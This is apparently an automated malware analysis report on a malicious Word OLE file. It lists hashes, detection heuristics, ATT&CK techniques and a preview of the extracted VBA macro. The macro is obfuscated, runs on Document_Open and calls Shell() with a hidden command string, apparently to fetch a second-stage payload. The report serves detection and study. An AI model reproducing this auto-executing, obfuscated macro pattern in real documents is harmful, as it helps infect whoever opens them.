Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b29091e1dfdda47c…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 101.0 KB
Created: 2018-06-15 19:27:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 712fbc52ac8b1a9e887fef6c2519ec14
SHA-1: 33fff0a2184ed6757b42cb6f5b9dd6d1c4cc0611
SHA-256: b29091e1dfdda47cc3d21f565816a16ead7e099c38566b1972d896963a9fc1cc
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro. The 'Document_Open' macro triggers a 'Shell()' call, which is a critical finding indicating the execution of arbitrary commands. This macro is designed to download and execute a second-stage payload, as suggested by the ClamAV detection name 'Doc.Malware.Valyria-6874636-0'. The VBA code is heavily obfuscated, but the intent to execute an external command is clear.

Heuristics (7)

  • ClamAV: Doc.Malware.Valyria-6874636-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-6874636-0
  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical; OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (high; OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region (high; OLE_SLACK_ANOMALY)
    OLE file is 103,424 bytes but its declared streams total only 57,355 bytes — 46,069 bytes (45%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2115 bytes
SHA-256: 2437dade82b90d9b3ad727575d7dee1cc4bf8ce10624f7e70ee48689b8c8b122

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE))
wbDMLX = QZGlRP
XNsqf = Rnd(rIRZw)
wjrJo = 32268 + AbkTcI
RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI))
QzmhYa = QfQHu
wSKLd = Rnd(MJaYQ)
ftlIz = 53836 + wjPmc
sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd))
AlavF = zCzlKd
FkRQZr = Rnd(MfGsHh)
pnITS = 52299 + qzzmIs
wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk))
rcvQhh = GZTkX
JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT
OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak))
pjOLnB = IzoBc
vuMMvj = Rnd(JVhaK)
dKZVS = 15701 + cRjYIC
KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK))
HqCmYw = klbzm
JuCkk = Rnd(vlpkz)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw))
cwihbC = CkpKN
NiLFF = Rnd(jurDO)
bKuVw = 82105 + tuJCEB
jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku))
zHakl = Edhzl
XLWTC = Rnd(KUnRDb)
huQWaidES
HWqUP = 54100 + wLfZjZ
MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT))
uKjEcS = CBiwz
PMmAf = Rnd(WVzPpk)
wPdrHZ = 92870 + YCHqz
jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX))
RjARz = wWHAmv
HwUVc = Rnd(cjwrvq)
End Sub